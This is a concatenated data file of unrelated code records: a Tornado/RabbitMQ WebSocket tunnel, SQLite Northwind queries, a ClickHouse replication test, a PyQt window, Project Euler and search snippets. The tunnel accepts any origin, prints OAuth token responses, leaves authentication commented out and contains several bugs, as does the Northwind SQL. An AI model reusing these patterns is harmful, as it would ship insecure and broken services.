0:\r\n l_form = LeadForm( self.data_dict )\r\n self.assertTrue(l_form.is_valid())\r\n lead_obj = l_form.save()\r\n client_lead=Client_Lead(leadsent=lead_obj,client=order)\r\n self.failUnless(isinstance(client_lead, Client_Lead))\r\n category=CourseCategory.objects.get(id=self.category)\r\n self.failUnless(isinstance(category, CourseCategory))","sub_path":"fghqlnoebnq/lms_migration/userapp/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"586660506","text":"#What is the value of the first triangle number to have over five hundred divisors?\n\nfrom math import floor\nfrom math import sqrt\n\ndef gen_tri_num(a):\n tri_num = 0\n for i in range(1, a+1):\n tri_num = tri_num + i\n return tri_num\n \ndef num_of_divisors(tri_num):\n divisor_list = []\n for i in range(1, int(floor(sqrt(tri_num)))+1):\n if tri_num%i == 0:\n x = i\n y = tri_num/i\n if x != y:\n divisor_list.append(i)\n divisor_list.append(tri_num/i)\n else:\n divisor_list.append(i)\n return len(divisor_list)\n\nnum_of_divisors(gen_tri_num(7))\n\n\ni = 1\nwhile num_of_divisors(gen_tri_num(i)) < 501:\n i += 1\nelse:\n print(gen_tri_num(i))\n","sub_path":"p12.py","file_name":"p12.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"637532965","text":"#\n#\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n#\n\nimport argparse\nimport base64\nimport functools\nimport json\nimport sys\nimport uuid\nimport weakref\n\nfrom threading import Thread, Lock\n\ntry:\n from urllib.parse import urlencode\nexcept ImportError:\n from urllib import urlencode\n\nimport pika\nimport tornado.websocket\nimport tornado.ioloop\nimport tornado.auth\nimport tornado.escape\nimport tornado.concurrent\n\n\nSETTINGS = {}\n\n\nclass Error(Exception):\n \"\"\"Base error class for exceptions in this module\"\"\"\n pass\n\nclass ConsumerConfigError(Error):\n \"\"\"Raised when an issue with consumer configuration occurs\"\"\"\n def __init__(self, message):\n self.message = message\n\nclass ConsumerKeyError(Error):\n def __init__(self, message, key):\n self.message = message\n self.key = key\n\nclass AuthError(Error):\n \"\"\"Raised when something went wrong during authentication\"\"\"\n def __init__(self, error, code):\n self.message = error\n self.code = code\n\n\n\nclass PikaAsyncConsumer(Thread):\n\n \"\"\"\n The primary entry point for routing incoming messages to the proper handler.\n\n \"\"\"\n\n def __init__(self, rabbitmq_url, exchange_name, queue_name,\n exchange_type=\"direct\", routing_key=\"#\"):\n \"\"\"\n Create a new instance of Streamer.\n\n Arguments:\n rabbitmq_url -- URL to RabbitMQ server\n exchange_name -- name of RabbitMQ exchange to join\n queue_name -- name of RabbitMQ queue to join\n\n Keyword Arguments:\n exchange_type -- one of 'direct', 'topic', 'fanout', 'headers'\n (default 'direct')\n routing_keys -- the routing key that this consumer listens for\n (default '#', receives all messages)\n\n \"\"\"\n print(\"Creating new consumer\")\n super(PikaAsyncConsumer, self).__init__(daemon=True)\n self._connection = None\n self._channel = None\n self._shut_down = False\n self._consumer_tag = None\n self._url = rabbitmq_url\n self._client_list = []\n self._lock = Lock()\n\n # The following are necessary to guarantee that both the RabbitMQ\n # server and Streamer know where to look for messages. These names will\n # be decided before dispatch and should be recorded in a config file or\n # else on a per-job basis.\n self._exchange = exchange_name\n self._exchange_type = exchange_type\n self._queue = queue_name\n self._routing_key = routing_key\n\n def add_client(self, client):\n \"\"\"Add a new client to the recipient list.\n\n Arguments:\n client -- a reference to the client object to add\n \"\"\"\n self._lock.acquire()\n # Create a weakref to ensure that cyclic references to WebSocketHandler\n # objects do not cause problems for garbage collection\n self._client_list.append(weakref.ref(client))\n self._lock.release()\n\n def remove_client(self, client):\n \"\"\"Remove a client from the recipient list.\n\n Arguments:\n client -- a reference to the client object to remove\n \"\"\"\n self._lock.acquire()\n for i in range(0, len(self._client_list)):\n # Parentheses after _client_list[i] to deference the weakref to its\n # strong reference\n if self._client_list[i]() is client:\n self._client_list.pop(i)\n break\n self._lock.release()\n\n\n def connect(self):\n \"\"\"\n Create an asynchronous connection to the RabbitMQ server at URL.\n\n \"\"\"\n return pika.SelectConnection(pika.URLParameters(self._url),\n on_open_callback=self.on_connection_open,\n on_close_callback=self.on_connection_close,\n stop_ioloop_on_close=False)\n\n def on_connection_open(self, unused_connection):\n \"\"\"\n Actions to perform when the connection opens. This may not happen\n immediately, so defer action to this callback.\n\n Arguments:\n unused_connection -- the created connection (by this point already\n available as self._connection)\n\n \"\"\"\n self._connection.channel(on_open_callback=self.on_channel_open)\n\n def on_connection_close(self, connection, code, text):\n \"\"\"\n Actions to perform when the connection is unexpectedly closed by the\n RabbitMQ server.\n\n Arguments:\n connection -- the connection that was closed (same as self._connection)\n code -- response code from the RabbitMQ server\n text -- response body from the RabbitMQ server\n\n \"\"\"\n self._channel = None\n if self._shut_down:\n self._connection.ioloop.stop()\n else:\n self._connection.add_timeout(5, self.reconnect)\n\n def reconnect(self):\n \"\"\"\n Attempt to reestablish a connection with the RabbitMQ server.\n \"\"\"\n self._connection.ioloop.stop() # Stop the ioloop to completely close\n\n if not self._shut_down: # Connect and restart the ioloop\n self._connection = self.connect()\n self._connection.ioloop.start()\n\n def on_channel_open(self, channel):\n \"\"\"\n Store the opened channel for future use and set up the exchange and\n queue to be used.\n\n Arguments:\n channel -- the Channel instance opened by the Channel.Open RPC\n \"\"\"\n self._channel = channel\n self._channel.add_on_close_callback(self.on_channel_close)\n self.declare_exchange()\n\n\n def on_channel_close(self, channel, code, text):\n \"\"\"\n Actions to perform when the channel is unexpectedly closed by the\n RabbitMQ server.\n\n Arguments:\n connection -- the connection that was closed (same as self._connection)\n code -- response code from the RabbitMQ server\n text -- response body from the RabbitMQ server\n \"\"\"\n self._connection.close()\n\n def declare_exchange(self):\n \"\"\"\n Set up the exchange that will route messages to this consumer. Each\n RabbitMQ exchange is uniquely identified by its name, so it does not\n matter if the exchange has already been declared.\n \"\"\"\n self._channel.exchange_declare(self.declare_exchange_success,\n self._exchange,\n self._exchange_type)\n\n def declare_exchange_success(self, unused_connection):\n \"\"\"\n Actions to perform on successful exchange declaration.\n \"\"\"\n self.declare_queue()\n\n def declare_queue(self):\n \"\"\"\n Set up the queue that will route messages to this consumer. Each\n RabbitMQ queue can be defined with routing keys to use only one\n queue for multiple jobs.\n \"\"\"\n self._channel.queue_declare(self.declare_queue_success,\n self._queue)\n\n def declare_queue_success(self, method_frame):\n \"\"\"\n Actions to perform on successful queue declaration.\n \"\"\"\n self._channel.queue_bind(self.munch,\n self._queue,\n self._exchange,\n self._routing_key\n )\n\n def munch(self, unused):\n \"\"\"\n Begin consuming messages from the Airavata API server.\n \"\"\"\n self._channel.add_on_cancel_callback(self.cancel_channel)\n self._consumer_tag = self._channel.basic_consume(self._process_message)\n\n def cancel_channel(self, method_frame):\n if self._channel is not None:\n self._channel._close()\n\n def _process_message(self, ch, method, properties, body):\n \"\"\"\n Receive and verify a message, then pass it to the router.\n\n Arguments:\n ch -- the channel that routed the message\n method -- delivery information\n properties -- message properties\n body -- the message\n \"\"\"\n print(\"Received Message: %s\" % body)\n self._lock.acquire()\n for client in self._client_list:\n # Parentheses after client to deference the weakref to its\n # strong reference\n client().write_message(body)\n self._lock.release()\n self._channel.basic_ack(delivery_tag=method.delivery_tag)\n\n def stop_consuming(self):\n \"\"\"\n Stop the consumer if active.\n \"\"\"\n if self._channel:\n self._channel.basic_cancel(self.close_channel, self._consumer_tag)\n\n def close_channel(self, unused):\n \"\"\"\n Close the channel to shut down the consumer and connection.\n \"\"\"\n self._channel.queue_delete(queue=self._queue)\n self._channel.close()\n\n def run(self):\n \"\"\"\n Start a connection with the RabbitMQ server.\n \"\"\"\n self._connection = self.connect()\n self._connection.ioloop.start()\n\n def stop(self):\n \"\"\"\n Stop an active connection with the RabbitMQ server.\n \"\"\"\n self._closing = True\n self.stop_consuming()\n\n\nclass Wso2OAuth2Mixin(tornado.auth.OAuth2Mixin):\n _OAUTH_AUTHORIZE_URL = \"https://idp.scigap.org:9443/oauth2/authorize\"\n _OAUTH_ACCESS_TOKEN_URL = \"https://idp.scigap.org:9443/oauth2/token\"\n\n @tornado.auth._auth_return_future\n def get_authenticated_user(self, username, password, callback=None):\n print(\"Authenticating user %s\" % (username))\n http = self.get_auth_http_client()\n body = urlencode({\n \"client_id\": SETTINGS[\"oauth_client_key\"],\n \"client_secret\": SETTINGS[\"oauth_client_secret\"],\n \"grant_type\": SETTINGS[\"oauth_grant_type\"],\n \"username\": username,\n \"password\": password\n })\n http.fetch(self._OAUTH_ACCESS_TOKEN_URL, functools.partial(self._on_access_token, callback), method=\"POST\", body=body)\n\n def _on_access_token(self, future, response):\n if response.error:\n print(str(response))\n print(response.body)\n print(response.error)\n future.set_exception(AuthError(response.error, response.code))\n return\n\n print(response.body)\n future.set_result(tornado.escape.json_decode(response.body))\n\nclass AuthHandler(tornado.web.RequestHandler, Wso2OAuth2Mixin):\n def get_current_user(self):\n expires_in = self.get_secure_cookie(\"expires-in\", max_age_days=SETTINGS['maximum_cookie_age'])\n print(expires_in)\n if expires_in:\n return self.get_secure_cookie(\"ws-auth-token\", max_age_days=float(expires_in))\n return None\n\n def set_default_headers(self):\n self.set_header(\"Content-Type\", \"text/plain\")\n self.set_header(\"Access-Control-Allow-Origin\", \"*\")\n self.set_header(\"Access-Control-Allow-Headers\", \"x-requested-with\")\n self.set_header('Access-Control-Allow-Methods', 'POST, GET, OPTIONS')\n\n def get(self):\n if self.get_current_user():\n self.set_status(200)\n print(\"Authenticated\")\n self.write(\"Authenticated\")\n\n else:\n self.set_status(403)\n print(\"Not Authenticated\")\n self.write(\"Not Authenticated\")\n\n @tornado.gen.coroutine\n def post(self):\n try:\n username = self.get_body_argument(\"username\")\n password = self.get_body_argument(\"password\")\n redirect = self.get_body_argument(\"redirect\")\n if username == \"\" or password == \"\":\n raise tornado.web.MissingArgumentError\n\n access = yield self.get_authenticated_user(username, password)\n days = (access[\"expires_in\"] / 3600) / 24 # Convert to days\n print(days)\n self.set_secure_cookie(\"ws-auth-token\",\n access[\"access_token\"],\n expires_days=days)\n self.set_secure_cookie(\"expires-in\",\n str(1),\n expires_days=SETTINGS['maximum_cookie_age'])\n self.write(\"Success\")\n except tornado.web.MissingArgumentError:\n print(\"Missing an argument\")\n self.set_status(400)\n self.write(\"Authentication information missing\")\n except AuthError as e:\n print(\"The future freaks me out\")\n self.set_status(access.code)\n self.set_header(\"Content-Type\", \"text/html\")\n self.write(access.message)\n\n success_code = \"\"\"

Redirecting to %(url)s

\n\n \"\"\" % { 'url': redirect}\n self.set_status(200)\n self.redirect(redirect)\n #return self.render_string(success_code)\n\n\n\nclass AMQPWSHandler(tornado.websocket.WebSocketHandler):#, Wso2OAuth2Mixin):\n\n \"\"\"\n Pass messages to a connected WebSockets client.\n\n A subclass of the Tornado WebSocketHandler class, this class takes no\n action when receiving a message from the client. Instead, it is associated\n with an AMQP consumer and writes a message to the client each time one is\n consumed in the queue.\n \"\"\"\n\n # def set_default_headers(self):\n # self.set_header(\"Access-Control-Allow-Origin\", \"*\")\n # self.set_header(\"Access-Control-Allow-Headers\", \"x-requested-with\")\n # self.set_header('Access-Control-Allow-Methods', 'POST, GET, OPTIONS')\n\n def check_origin(self, origin):\n \"\"\"Check the domain origin of the connection request.\n\n This can be made more robust to ensure that connections are only\n accepted from verified PGAs.\n\n Arguments:\n origin -- the value of the Origin HTTP header\n \"\"\"\n return True\n\n def open(self, resource_type, resource_id):\n \"\"\"Associate a new connection with a consumer.\n\n When a new connection is opened, it is a request to retrieve data\n from an AMQP queue. The open operation should also do some kind of\n authentication.\n\n Arguments:\n resource_type -- \"experiment\" or \"project\" or \"data\"\n resource_id -- the Airavata id for the resource\n \"\"\"\n self.stream.set_nodelay(True)\n self.resource_id = resource_id\n self.write_message(\"Opened the connection\")\n\n self.add_to_consumer()\n\n # expires_in = self.get_secure_cookie(\"expires_in\", max_age_days=SETTINGS[\"maximum_cookie_age\"])\n # if expires_in is not None and self.get_secure_cookie(\"ws-auth-token\", max_age_days=float(expires_in)):\n # print(\"Found secure cookie\")\n # self.write_message(\"Authenticated\")\n # self.add_to_consumer()\n # else:\n # print(\"Closing connection\")\n # self.close()\n\n def on_message(self, message):\n \"\"\"Handle incoming messages from the client.\n\n Tornado requires subclasses to override this method, however in this\n case we do not wish to take any action when receiving a message from\n the client. The purpose of this class is only to push messages to the\n client.\n \"\"\"\n print(message)\n message = tornado.escape.json_decode(message)\n access = yield self.get_authenticated_user(message[\"username\"], message[\"password\"])\n access = access\n days = (access[\"expires_in\"] / 3600) / 24 # Convert to days\n print(days)\n self.set_secure_cookie(\"ws-auth-token\",\n access[\"access_token\"],\n expires_days=days)\n self.set_secure_cookie(\"expires_in\",\n str(days),\n expires_days=SETTINGS['maximum_cookie_age'])\n\n\n def on_close(self):\n try:\n print(\"Closing connection\")\n self.application.remove_client_from_consumer(self.resource_id, self)\n except KeyError:\n print(\"Error: resource %s does not exist\" % self.resource_id)\n finally:\n self.close()\n\n def add_to_consumer(self):\n try:\n self.application.add_client_to_consumer(self.resource_id, self)\n except AttributeError as e:\n print(\"Error: tornado.web.Application object is not AMQPWSTunnel\")\n print(e)\n\n\nclass AMQPWSTunnel(tornado.web.Application):\n\n \"\"\"\n Send messages from an AMQP queue to WebSockets clients.\n\n In addition to the standard Tornado Application class functionality, this\n class maintains a list of active AMQP consumers and maps WebSocketHandlers\n to the correct consumers.\n \"\"\"\n\n def __init__(self, consumer_list=None, consumer_config=None, handlers=None,\n default_host='', transforms=None, **settings):\n print(\"Starting AMQP-WS-Tunnel application\")\n super(AMQPWSTunnel, self).__init__(handlers=handlers,\n default_host=default_host,\n transforms=transforms,\n **settings)\n\n self.consumer_list = {} if consumer_list is None else consumer_list\n if consumer_config is None:\n raise ConsumerConfigError(\"No consumer configuration provided\")\n self.consumer_config = consumer_config\n\n def consumer_exists(self, resource_id):\n \"\"\"Determine if a consumer exists for a particular resource.\n\n Arguments:\n resource_id -- the consumer to find\n \"\"\"\n return resource_id in self.consumer_list\n\n def add_client_to_consumer(self, resource_id, client):\n \"\"\"Add a new client to a consumer's messaging list.\n\n Arguments:\n resource_id -- the consumer to add to\n client -- the client to add\n \"\"\"\n if not self.consumer_exists(resource_id):\n print(\"Creating new consumer\")\n print(self.consumer_config)\n consumer = PikaAsyncConsumer(self.consumer_config[\"rabbitmq_url\"],\n self.consumer_config[\"exchange_name\"],\n self.consumer_config[\"queue_name\"],\n exchange_type=self.consumer_config[\"exchange_type\"],\n routing_key=resource_id)\n print(\"Adding to consumer list\")\n self.consumer_list[resource_id] = consumer\n print(\"Starting consumer\")\n consumer.start()\n\n print(\"Adding new client to %s\" % (resource_id))\n consumer = self.consumer_list[resource_id]\n consumer.add_client(client)\n\n def remove_client_from_consumer(self, resource_id, client):\n \"\"\"Remove a client from a consumer's messaging list.\n\n Arguments:\n resource_id -- the consumer to remove from\n client -- the client to remove\n \"\"\"\n if self.consumer_exists(resource_id):\n print(\"Removing client from %s\" % (resource_id))\n self.consumer_list[resource_id].remove_client(client)\n #else:\n # raise ConsumerKeyError(\"Trying to remove client from nonexistent consumer\", resource_id)\n\n def shutdown(self):\n \"\"\"Shut down the application and release all resources.\n\n\n \"\"\"\n for name, consumer in self.consumer_list.items():\n consumer.stop()\n #consumer.join()\n #self.consumer_list[name] = None\n\n #self.consumer_list = {}\n\n\n\nif __name__ == \"__main__\":\n i = open(sys.argv[1])\n config = json.load(i)\n i.close()\n\n SETTINGS[\"oauth_client_key\"] = config[\"oauth_client_key\"]\n SETTINGS[\"oauth_client_secret\"] = config[\"oauth_client_secret\"]\n SETTINGS[\"oauth_grant_type\"] = config[\"oauth_grant_type\"]\n SETTINGS[\"maximum_cookie_age\"] = config[\"maximum_cookie_age\"]\n\n settings = {\n \"cookie_secret\": base64.b64encode(uuid.uuid4().bytes + uuid.uuid4().bytes),\n #\"xsrf_cookies\": True\n }\n\n application = AMQPWSTunnel(handlers=[\n (r\"/auth\", AuthHandler),\n (r\"/(experiment)/(.+)\", AMQPWSHandler)\n ],\n consumer_config=config,\n debug=True,\n **settings)\n\n application.listen(8888)\n\n try:\n tornado.ioloop.IOLoop.current().start()\n except KeyboardInterrupt:\n application.shutdown()\n","sub_path":"sandbox/amqpwstunnel/python/amqpwstunnel.py","file_name":"amqpwstunnel.py","file_ext":"py","file_size_in_byte":21353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"173816376","text":"import sqlite3\n\nnorthwind_conn = sqlite3.connect('northwind_small.sqlite3')\nnorthwind_cursor1 = northwind_conn.cursor()\n\nmost_expensive_query = (\n 'SELECT ProductName FROM ' +\n '(SELECT * FROM Product ' +\n 'Order by UnitPrice DESC LIMIT 10);'\n)\n\nmost_expensive = northwind_cursor1.execute(most_expensive_query).fetchall()\nmost_expensive_string = ''\nfor i in range(len(most_expensive) - 1):\n most_expensive_string = most_expensive_string + most_expensive[i][0] + ', '\nmost_expensive_string = most_expensive_string + most_expensive[9][0]\n\n\"\"\"10 MostExpensive Items\"\"\"\nprint(f'The 10 most expensive items are: {most_expensive_string}.\\n')\n\n\nbirth_dates = northwind_cursor1.execute(\n 'SELECT BirthDate FROM Employee;'\n ).fetchall()\nhire_dates = northwind_cursor1.execute(\n 'SELECT HireDate FROM Employee;'\n ).fetchall()\n\n\ndef split_dates(dates):\n years = []\n months = []\n days = []\n for i in range(len(dates)):\n split_date = dates[i][0].split('-')\n years.append(int(split_date[0]))\n months.append(int(split_date[1]))\n days.append(int(split_date[2]))\n\n return years, months, days\n\n\ndef get_average(list):\n return int(sum(list) / len(list))\n\n\nbrith_years, birth_months, birth_days = split_dates(birth_dates)\nhire_years, hire_months, hire_days = split_dates(hire_dates)\n\nage = []\nfor i in range(len(brith_years)):\n year = (hire_years[i] - brith_years[i])\n if(hire_months[i] < birth_months[i]):\n year -= 1\n elif(hire_months[i] == birth_months[i]):\n if(hire_days[i] < birth_days[i]):\n year -= 1\n age.append(year)\n\n\"\"\"Average age of employees at hire\"\"\"\nprint(f'The Average Age of Employees at the time of hire is' +\n f'{get_average(age)}.\\n')\n\n\nemployee_cities = northwind_cursor1.execute(\n 'SELECT City FROM Employee;'\n ).fetchall()\ncities = []\ncity_agess = []\n\nfor i in range(len(employee_cities)):\n employee_cities[i] = employee_cities[i][0]\n if employee_cities[i] not in cities:\n cities.append(employee_cities[i])\n city_agess.append([age[i]])\n else:\n index = cities.index(employee_cities[i])\n city_agess[index].append(age[i])\n\n\"\"\"Average age of employees at hire per city\"\"\"\nfor i in range(len(cities)):\n print(f'The Average Age of Employees from {cities[i]}' +\n f'at the time of hire is {get_average(city_agess[i])}.\\n\\n')\n\nnorthwind_cursor1.close()\n\nnorthwind_cursor2 = northwind_conn.cursor()\n\nproduct_supplier_price_query = ('SELECT Product.ProductName, ' +\n 'Supplier.CompanyName FROM Product ' +\n 'INNER JOIN Supplier ON '\n 'Product.SupplierId = Supplier.id ' +\n 'ORDER BY Product.UnitPrice DESC ' +\n 'LIMIT 10;')\n\n\"\"\"10 MostExpensive Items with their Suppliers\"\"\"\nprint(str(northwind_cursor2.execute(product_supplier_price_query).fetchall()) + '\\n\\n')\n\n\nlargest_category_query = ('SELECT Category.CategoryName ' +\n 'FROM Product ' +\n 'NNER JOIN Category ' +\n 'ON CategoryId = Category.id ' +\n 'GROUP BY Category.CategoryName ' +\n 'ORDER BY count(DISTINCT ProductName) DESC '\n 'LIMIT 1;')\nlargest_category = northwind_cursor2.execute(largest_category_query).fetchone()[0]\n\"\"\"Largest Category\"\"\"\nprint(f'The Largest Category is {largest_category}')\n\nnorthwind_cursor2.close()\nnorthwind_conn.close()\n","sub_path":"DSPT1-Sprint-10/northwind.py","file_name":"northwind.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"442423468","text":"import time\n\nimport pytest\nfrom helpers.cluster import ClickHouseCluster\nfrom helpers.test_tools import assert_eq_with_retry\nfrom helpers.network import PartitionManager\n\n\ndef fill_nodes(nodes, shard):\n for node in nodes:\n node.query(\n '''\n CREATE DATABASE test;\n\n CREATE TABLE test.test_table(date Date, id UInt32)\n ENGINE = ReplicatedMergeTree('/clickhouse/tables/test{shard}/replicated', '{replica}') ORDER BY id PARTITION BY toYYYYMM(date) SETTINGS min_replicated_logs_to_keep=3, max_replicated_logs_to_keep=5, cleanup_delay_period=0, cleanup_delay_period_random_add=0;\n '''.format(shard=shard, replica=node.name))\n\n\ncluster = ClickHouseCluster(__file__)\nnode1 = cluster.add_instance('node1', main_configs=['configs/remote_servers.xml'], with_zookeeper=True)\nnode2 = cluster.add_instance('node2', main_configs=['configs/remote_servers.xml'], with_zookeeper=True)\n\n\n@pytest.fixture(scope=\"module\")\ndef start_cluster():\n try:\n cluster.start()\n\n fill_nodes([node1, node2], 1)\n\n yield cluster\n\n except Exception as ex:\n print(ex)\n\n finally:\n cluster.shutdown()\n\ndef test_readonly_metrics(start_cluster):\n assert node1.query(\"SELECT value FROM system.metrics WHERE metric = 'ReadonlyReplica'\") == \"0\\n\"\n\n with PartitionManager() as pm:\n ## make node1 readonly -> heal -> readonly -> heal -> detach table -> heal -> attach table\n pm.drop_instance_zk_connections(node1)\n assert_eq_with_retry(node1, \"SELECT value FROM system.metrics WHERE metric = 'ReadonlyReplica'\", \"1\\n\", retry_count=300, sleep_time=1)\n\n pm.heal_all()\n assert_eq_with_retry(node1, \"SELECT value FROM system.metrics WHERE metric = 'ReadonlyReplica'\", \"0\\n\", retry_count=300, sleep_time=1)\n\n pm.drop_instance_zk_connections(node1)\n assert_eq_with_retry(node1, \"SELECT value FROM system.metrics WHERE metric = 'ReadonlyReplica'\", \"1\\n\", retry_count=300, sleep_time=1)\n\n\n node1.query(\"DETACH TABLE test.test_table\")\n assert \"0\\n\" == node1.query(\"SELECT value FROM system.metrics WHERE metric = 'ReadonlyReplica'\")\n\n pm.heal_all()\n node1.query(\"ATTACH TABLE test.test_table\")\n assert_eq_with_retry(node1, \"SELECT value FROM system.metrics WHERE metric = 'ReadonlyReplica'\", \"0\\n\", retry_count=300, sleep_time=1)\n\n","sub_path":"tests/integration/test_system_metrics/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"367121400","text":"from django.urls import path\n\nfrom . import views\n\n\napp_name = 'projects'\n\nurlpatterns = [\n path('/delete', views.ProjectsDeleteView.as_view(), name='delete'),\n path('/edit', views.ProjectsUpdateView.as_view(), name='edit'),\n path('/', views.ProjectsDetailView.as_view(), name='detail'),\n path('new/', views.ProjectsCreateView.as_view(), name='create'),\n path('', views.ProjectsListView.as_view(), name='list'),\n]","sub_path":"portfolio/projects/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"6348915","text":"from PyQt5.QtWidgets import QWidget, QListWidgetItem\nfrom PyQt5.Qt import QMessageBox\nfrom models import Dataset, Project, Monkey, TimeInterval, AllocatException\nfrom views.ui import Ui_projectWindow\n\n\nclass ProjectWindow(QWidget):\n\n # noinspection PyUnresolvedReferences\n def __init__(self):\n super(ProjectWindow, self).__init__()\n self.ui = Ui_projectWindow()\n self.ui.setupUi(self)\n self.lst = self.ui.listWidget\n\n self.current_rec_id = None\n self._set_prj_by_emp()\n\n self._load_list(Dataset.projects.keys())\n self._load_emp_list()\n\n self.lst.itemClicked.connect(self._rec_selected)\n self.ui.addBtn.clicked.connect(self._add_clicked)\n self.ui.saveBtn.clicked.connect(self._save_clicked)\n self.ui.removeBtn.clicked.connect(self._remove_clicked)\n self.ui.asnsBtn.clicked.connect(self._asns_clicked)\n self.ui.empList.currentIndexChanged.connect(self._emp_filter)\n self.ui.allBtn.clicked.connect(self._all_clicked)\n\n self.setMinimumWidth(800)\n\n def _set_prj_by_emp(self):\n d = {}\n for asn in Dataset.assignments:\n if asn.employee_name not in d:\n d[asn.employee_name] = []\n d[asn.employee_name].append(asn.project_name)\n self.prj_by_emp = d\n\n def _load_list(self, nicknames, selected=None):\n self.lst.clear()\n if not nicknames:\n return\n selected_index = 0\n for idx, nickname in enumerate(sorted(nicknames)):\n item = QListWidgetItem(nickname)\n self.lst.addItem(item)\n if nickname == selected:\n selected_index = idx\n self.lst.setCurrentItem(self.lst.item(selected_index))\n self._rec_selected()\n\n def _load_emp_list(self):\n self.ui.empList.clear()\n emps = sorted(Dataset.employees.keys())\n for name in emps:\n self.ui.empList.addItem(name)\n\n def _emp_filter(self):\n emp_name = self.ui.empList.currentText()\n projects = self.prj_by_emp[emp_name]\n self._load_list(projects)\n\n def _rec_selected(self):\n rec = Dataset.projects[self.lst.currentItem().text()]\n self.ui.nameEdit.setText(rec.name)\n self.ui.nameEdit.setToolTip(rec.name)\n self.ui.nameEdit.setCursorPosition(0)\n self.ui.nicknameEdit.setText(rec.nickname)\n self.ui.firstMonthEdit.setText(Monkey.prettify(rec.first_month))\n self.ui.lastMonthEdit.setText(Monkey.prettify(rec.last_month))\n self.ui.notesEdit.setPlainText(rec.notes)\n self.ui.billingEdit.setPlainText(rec.billing)\n self.current_rec_id = rec.id\n\n def _all_clicked(self):\n self._load_list(Dataset.projects.keys())\n\n def _add_clicked(self):\n self.current_rec_id = None\n self._clear_form()\n self.ui.nameEdit.setFocus()\n self.ui.addBtn.setEnabled(False)\n\n def _clear_form(self):\n self.ui.nameEdit.setText(None)\n self.ui.nicknameEdit.setText(None)\n self.ui.firstMonthEdit.setText(None)\n self.ui.lastMonthEdit.setText(None)\n self.ui.notesEdit.setPlainText(None)\n self.ui.billingEdit.setPlainText(None)\n\n def _save_clicked(self):\n interval = self._validate_monkeys()\n if not interval:\n return\n rec = Project([\n self.current_rec_id,\n self.ui.nicknameEdit.text(),\n self.ui.nameEdit.text(),\n interval.first_month,\n interval.last_month,\n self.ui.notesEdit.toPlainText(),\n self.ui.billingEdit.toPlainText()\n ])\n try:\n rec.save()\n except AllocatException as e:\n QMessageBox.critical(QMessageBox(), 'Input Error', e.msg)\n self.ui.nameEdit.setFocus()\n return\n Dataset.projects = Project.get_all()\n self._load_list(Dataset.projects.keys(), rec.nickname)\n self.ui.addBtn.setEnabled(True)\n\n def _validate_monkeys(self):\n first_month = Monkey.unslash(self.ui.firstMonthEdit.text())\n last_month = Monkey.unslash(self.ui.lastMonthEdit.text())\n if not Monkey.is_valid_pair(first_month, last_month):\n msg = 'Invalid time frame: invalid month or first month after last month!'\n QMessageBox.critical(QMessageBox(), 'Input Error', msg)\n self.ui.firstMonthEdit.setFocus()\n return None\n return TimeInterval(first_month=first_month, last_month=last_month)\n\n def _remove_clicked(self):\n nickname = self.ui.nicknameEdit.text()\n msg = 'Are you sure you want to remove project ' + nickname + '?'\n reply = QMessageBox.question(QMessageBox(), 'Double check', msg)\n if reply == QMessageBox.Yes:\n rec = Dataset.projects[nickname]\n rec.remove()\n del Dataset.projects[nickname]\n self._load_list(Dataset.projects.keys())\n\n def _asns_clicked(self):\n nickname = self.ui.nicknameEdit.text()\n prj = Dataset.projects[nickname]\n prj.set_assignments()\n\n from views import AssignmentDialog\n assignment_dialog = AssignmentDialog(prj)\n assignment_dialog.exec_()\n\n","sub_path":"views/project_window.py","file_name":"project_window.py","file_ext":"py","file_size_in_byte":5218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"437771451","text":"def sparse_search(arr, item):\n def inner_search(arr, item, low, high):\n middle = ((high - low) // 2) + low\n\n if arr[middle] == \"\":\n left = middle - 1\n right = middle + 1\n while True:\n if left < low and right > high:\n return None\n elif right <= high and arr[right] != \"\":\n middle = right\n break\n elif left >= low and arr[left] != \"\":\n middle = left\n break\n left -= 1\n right += 1\n\n if arr[middle] == item:\n return middle\n if arr[middle] > item:\n return inner_search(arr, item, low, middle - 1)\n if arr[middle] < item:\n return inner_search(arr, item, middle + 1, high)\n\n return inner_search(arr, item, 0, len(arr) - 1)\n\n\ndef sparse_search_hh(arr, target):\n def helper(arr, left, right, target):\n if left > right:\n return None\n mid = (left + right) // 2\n\n if arr[mid] == \"\":\n mid_left, mid_right = mid - 1, mid + 1\n found = False\n while mid_left >= left and mid_right <= right: # 양방향으로 뻗어나가기 \n if arr[mid_left] != \"\":\n mid = mid_left\n found = True\n break\n if arr[mid_right] != \"\":\n mid = mid_right\n found = True\n break\n mid_left, mid_right = mid_left - 1, mid_right + 1\n if not found:\n return None\n\n if arr[mid] == target:\n return mid\n elif arr[mid] > target:\n return helper(arr, left, mid - 1, target)\n else:\n return helper(arr, mid + 1, right, target)\n return helper(arr, 0, len(arr) - 1, target)\n\ntest_cases = [\n (([\"a\", \"\", \"\", \"b\", \"\", \"c\", \"\", \"\", \"d\", \"\", \"\", \"\", \"\", \"e\", \"\"], \"d\"), 8),\n (([\"a\", \"\", \"\", \"b\", \"\", \"c\", \"\", \"\", \"d\", \"\", \"\", \"\", 